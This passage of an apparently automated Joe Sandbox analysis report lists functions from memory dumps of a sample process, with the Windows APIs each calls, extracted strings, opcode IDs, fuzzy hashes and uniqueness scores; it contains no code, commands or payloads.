                                                                                                                                                                                                                                                  • String ID: (bq$(bq$(bq
                                                                                                                                                                                                                                                  • API String ID: 0-2716923250
                                                                                                                                                                                                                                                  • Opcode ID: d7566c26a159683a443b4bac5f77be50a11e3b7e4c039797c109f1a5ab39be4d
                                                                                                                                                                                                                                                  • Instruction ID: 797514a60ff328a68f01990fc3b6d22d0e548e45f8ec98dd39427c3dafcc6c4a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7566c26a159683a443b4bac5f77be50a11e3b7e4c039797c109f1a5ab39be4d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2C18F31A142505FCB55DB28D84066DBFAAEF81314B29C5AAD855DF382C632ED42C7E4
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 063F2FF2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 1299 63f2ff2-63f306f call 63f076c GetKeyboardLayout 1304 63f3078-63f3094 1299->1304 1305 63f3071-63f3077 1299->1305 1305->1304
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetKeyboardLayout.USER32(00000000), ref: 063F305E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1949247347.00000000063F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_63f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: KeyboardLayout
                                                                                                                                                                                                                                                  • String ID: ()<c
                                                                                                                                                                                                                                                  • API String ID: 194098044-3558239423
                                                                                                                                                                                                                                                  • Opcode ID: 417593181ab32add746b9d4062a5f0315c3352b49e6f310fb6bc0836dd92896b
                                                                                                                                                                                                                                                  • Instruction ID: 87da4fa2f26945772262eac50b6f0b7972dbf1be129c84ce63579278656b0de5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 417593181ab32add746b9d4062a5f0315c3352b49e6f310fb6bc0836dd92896b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 221143B49103499EDB60EFA9C449BDEFFF4EB09210F10845AD519AB240C775A844CFA5
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 063F077C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46comCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 063F314D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1949247347.00000000063F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_63f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Initialize
                                                                                                                                                                                                                                                  • String ID: ()<c
                                                                                                                                                                                                                                                  • API String ID: 2538663250-3558239423
                                                                                                                                                                                                                                                  • Opcode ID: 3d64e95eb09998af7524a02fe26ead0db0912689ce9e2994c4a8b8a8a3c02645
                                                                                                                                                                                                                                                  • Instruction ID: 0753cc84ab1009971c5294823fb89b22744d653563f1741137efc971217ea366
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d64e95eb09998af7524a02fe26ead0db0912689ce9e2994c4a8b8a8a3c02645
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C21130B49002488FDB20DF9AD488BDEBBF8EB48320F20881AD519A7310C374A944CFE5
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 063F30F2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44comCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 063F314D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1949247347.00000000063F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_63f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Initialize
                                                                                                                                                                                                                                                  • String ID: ()<c
                                                                                                                                                                                                                                                  • API String ID: 2538663250-3558239423
                                                                                                                                                                                                                                                  • Opcode ID: c8667f33843040d9363f62f8d4a4c1826e04658a37405a1b0231b642551fa8b0
                                                                                                                                                                                                                                                  • Instruction ID: 430e376094e58a9ba5d124ad4068247d669c2c2fac1329cb5d7e6ecaef3bb883
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8667f33843040d9363f62f8d4a4c1826e04658a37405a1b0231b642551fa8b0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B511E2B59002488FDB20DF99D948BDEBBF4EB48324F24845AD559A7310D374A544CFA5
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065FB920 Relevance: 1.7, Strings: 1, Instructions: 442COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (bq
                                                                                                                                                                                                                                                  • API String ID: 0-149360118
                                                                                                                                                                                                                                                  • Opcode ID: 31da6f6e99fd4b7616b1dc910806e4a05a310eae0ae22d4f97d351690ad65441
                                                                                                                                                                                                                                                  • Instruction ID: 07fa92a14b2f17ead8c36bc41eca4104af172ca7aed175449ace1d04af2d76ec
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31da6f6e99fd4b7616b1dc910806e4a05a310eae0ae22d4f97d351690ad65441
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FF14634A11205DFCB54DF69D884AAEBBF6BF88310F158469E9069B391DB34ED41CF90
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 063F31BF Relevance: 1.6, APIs: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • KiUserExceptionDispatcher.NTDLL ref: 063F3318
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1949247347.00000000063F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_63f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 6842923-0
                                                                                                                                                                                                                                                  • Opcode ID: c2a6d28f39a1b25acd427c781c573faed40a1e384004d7c5b438bac9ae386784
                                                                                                                                                                                                                                                  • Instruction ID: d4e0a242e8c44c8378fe34152c656cbdcb42f4988fc83bf174ec0f0e445aba64
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2a6d28f39a1b25acd427c781c573faed40a1e384004d7c5b438bac9ae386784
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F551D6B4E10208DFDB48DFA6D9946DDBBB2FF88300F10912AE516AB364DB355946CF81
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 06630040 Relevance: 1.6, Strings: 1, Instructions: 340COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950464108.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6630000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (bq
                                                                                                                                                                                                                                                  • API String ID: 0-149360118
                                                                                                                                                                                                                                                  • Opcode ID: fdc5fef4c79a06f3223146d5057744d479837c897c575d4e37db9f3f879467c2
                                                                                                                                                                                                                                                  • Instruction ID: 31d3ffc2dce9b274ac1f4c5d65424e40f6be299b2cbe42ac5549249f18d1ffff
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fdc5fef4c79a06f3223146d5057744d479837c897c575d4e37db9f3f879467c2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75C1F330B142658FC759DF78D854AAEBBB6EFC5310B1881AAE805DB391DB31DC89C790
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 063F33A0 Relevance: 1.6, APIs: 1, Instructions: 60libraryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1949247347.00000000063F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_63f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                  • Opcode ID: 8af92399c1217449af672d0d8699ccfc7297b00d3d5fccc6e751ba8ac46629d5
                                                                                                                                                                                                                                                  • Instruction ID: eb86f29edbc5043481dca43189c442e23c5acd8250fc614201cdbe94bce3310c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8af92399c1217449af672d0d8699ccfc7297b00d3d5fccc6e751ba8ac46629d5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E021E074E01218DFDB48DFA9E884ADDBBB2FB89310F10906AE915B7360DB355841CF94
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065F4FA0 Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (bq
                                                                                                                                                                                                                                                  • API String ID: 0-149360118
                                                                                                                                                                                                                                                  • Opcode ID: 43c5bd42932eb6667520946324e74430bab8a28fec9a69ee6044e2e97e392ea6
                                                                                                                                                                                                                                                  • Instruction ID: cf6e76adebf6d5e499ea9e122066a826fb1772acfd3459b4b5307cc579cfd354
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43c5bd42932eb6667520946324e74430bab8a28fec9a69ee6044e2e97e392ea6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F911730E112499FDB54DFA8D898AADBBF2FF88300F148429E506AB395DB74AC45CF50
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065FA7C8 Relevance: 1.5, Strings: 1, Instructions: 230COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (bq
                                                                                                                                                                                                                                                  • API String ID: 0-149360118
                                                                                                                                                                                                                                                  • Opcode ID: 628f93e4e1073c02b32d38302296288e8e796c5a85430b7f81d980b9b519d096
                                                                                                                                                                                                                                                  • Instruction ID: d8eca244f22062959f3216ec51a4263c56483ec6d644295b5de3f9bb4ff13f1e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 628f93e4e1073c02b32d38302296288e8e796c5a85430b7f81d980b9b519d096
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69818C30B10205DFDB14DF68D994AAEBBF6FF88300F158469E906A7351DB71AC45CBA1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 06694620 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1951092425.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6690000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: Hbq
                                                                                                                                                                                                                                                  • API String ID: 0-1245868
                                                                                                                                                                                                                                                  • Opcode ID: db98ad1bf9cfa72474cea53ecb105b84b69a3d568e5185c68fdb0a3fd689e469
                                                                                                                                                                                                                                                  • Instruction ID: 61319655bed97d8926477da7c68411fa55bb1e9079fe872bc4aabce5393a5ff1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db98ad1bf9cfa72474cea53ecb105b84b69a3d568e5185c68fdb0a3fd689e469
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06319E74B042449FCB15AF79D95486E7BFBEF8521072444AAE809CB391DF36EC02CBA1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065F11A0 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: `Q^q
                                                                                                                                                                                                                                                  • API String ID: 0-1948671464
                                                                                                                                                                                                                                                  • Opcode ID: 5514e6bbb06ef848627b44d5574c34adc73690f59a84fcbc7557caa870924662
                                                                                                                                                                                                                                                  • Instruction ID: b416b25fc1aea373aacea903635edb7a8e60866412460843137f3f7248541576
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5514e6bbb06ef848627b44d5574c34adc73690f59a84fcbc7557caa870924662
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D321C335E10615DBCB60DFB5E9006EEB7A1FF44A50F1441AACA09D7280DB359A54CB82
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 066318F8 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950464108.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6630000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (bq
                                                                                                                                                                                                                                                  • API String ID: 0-149360118
                                                                                                                                                                                                                                                  • Opcode ID: b5035d66dd9876fcb915e7f26146f6374ae4d1abcf1070a589950c6f73269e66
                                                                                                                                                                                                                                                  • Instruction ID: 3f4028890ef14298b6ec6e06c54301f30871f9653e2d9e329ab62b6b33c2680c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5035d66dd9876fcb915e7f26146f6374ae4d1abcf1070a589950c6f73269e66
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4112931B093A45FD3559F3DD811A5A7FEA9FC6250719806AE445CB3C1DE34DC42C7A1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065F9080 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (bq
                                                                                                                                                                                                                                                  • API String ID: 0-149360118
                                                                                                                                                                                                                                                  • Opcode ID: cc988a16cb17cec41f746aaf791c35d142c33b63bb7a48d42c95d2ce4ffc654e
                                                                                                                                                                                                                                                  • Instruction ID: 6dadd0c35d983567ba61e6199307a0fa1d191e03c607770cb73b7c0ad4a026fa
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc988a16cb17cec41f746aaf791c35d142c33b63bb7a48d42c95d2ce4ffc654e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC1132307143424FE3049B7D9894A1A7BEAFFC9300754447AE10ACB386DE70DC06CB60
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 06694C90 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1951092425.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6690000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (_^q
                                                                                                                                                                                                                                                  • API String ID: 0-538443824
                                                                                                                                                                                                                                                  • Opcode ID: f6e25a17d58f95bbd698515d64339dce9039f592b2c2d3e6e8a94de4486c1320
                                                                                                                                                                                                                                                  • Instruction ID: 4b771a41e93bfb405d286c10035ecf222ffc303ac50e19c373b78fe6d2f82517
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f6e25a17d58f95bbd698515d64339dce9039f592b2c2d3e6e8a94de4486c1320
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D11A136710014DFDF456FB8E80896CBBE6EB883157048476F60ACB7A1CE3ADC219B84
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065F1191 Relevance: 1.3, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: `Q^q
                                                                                                                                                                                                                                                  • API String ID: 0-1948671464
                                                                                                                                                                                                                                                  • Opcode ID: a01e3652c5a5aafbad46692d733453e250f2555e6e591b9c939b8ef00a054a44
                                                                                                                                                                                                                                                  • Instruction ID: b4a984b336786c7840cbe0dccc36f330d16f0cc3024a6cc6df0b3fae726ceb91
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a01e3652c5a5aafbad46692d733453e250f2555e6e591b9c939b8ef00a054a44
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9012831F10211EFDB609BB5ED0476E76A2FF81A20F1041A5D905DB2C0DA719E55CB93
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 06632F49 Relevance: 1.3, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950464108.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6630000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 4'^q
                                                                                                                                                                                                                                                  • API String ID: 0-1614139903
                                                                                                                                                                                                                                                  • Opcode ID: 101faa4beebac8a94180761c5408b83fea2140f9c44e58779862578ef2570a36
                                                                                                                                                                                                                                                  • Instruction ID: 8d11885f7e9fcc007745652f5607cb377bc635eb864c496f2786fb0451ad59f1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 101faa4beebac8a94180761c5408b83fea2140f9c44e58779862578ef2570a36
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9701F7303002015FC705EB56E904AA6BBA2EBD4314F10892E944A43755CE7AEC87C795
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 06632F58 Relevance: 1.3, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950464108.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6630000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 4'^q
                                                                                                                                                                                                                                                  • API String ID: 0-1614139903
                                                                                                                                                                                                                                                  • Opcode ID: ffcbf4202b9589026ede3576e83ef89bffbb646262af37dcec48f161ecfeab0e
                                                                                                                                                                                                                                                  • Instruction ID: 99d3e2ff8a3ed43270cbf9b2820756c519858b1e5a5b424b4d50e67f7044ae6d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ffcbf4202b9589026ede3576e83ef89bffbb646262af37dcec48f161ecfeab0e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1F0F9303002015FC704F756E504AA6B7A2EBD8314B10892D840A03B54CFBAF887D794
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065FCA68 Relevance: .4, Instructions: 442COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 5bb3d7abe14c91c58eee2e7bc61617f627531029de22c9157479220227b5cd33
                                                                                                                                                                                                                                                  • Instruction ID: f76df73640c0d5a16198a8d1116d61257d18dc5fcceee37dc6db9ba781819031
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5bb3d7abe14c91c58eee2e7bc61617f627531029de22c9157479220227b5cd33
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19122D30A0020A9FCB55EF64D984A6EB7B2FF84300F54C968D5069F759DB74EC89CBA4
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 06696CC1 Relevance: .4, Instructions: 372COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1951092425.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6690000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 98f04cccbac74c57a6e68d0e6b45ead24fad1d1d4c72b82390e7590cdda63463
                                                                                                                                                                                                                                                  • Instruction ID: 01758cef20c3a0dfa43743cf66685fb4be3e96e6041f1408af1f69080d0c6213
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98f04cccbac74c57a6e68d0e6b45ead24fad1d1d4c72b82390e7590cdda63463
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9FD18B30B002499FDB54DFB8D8946AE7BF6AF88200F548469E805EB391DF749C45CBA4
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065FDA20 Relevance: .3, Instructions: 344COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: a6d859c2333612d478d3db04e9a1ca6a1c0440d6b745d45b571b46aef5025e48
                                                                                                                                                                                                                                                  • Instruction ID: ce0c90c0fa87f184f9890287e28ed2bac64699d28b52b36047c254700ecb1869
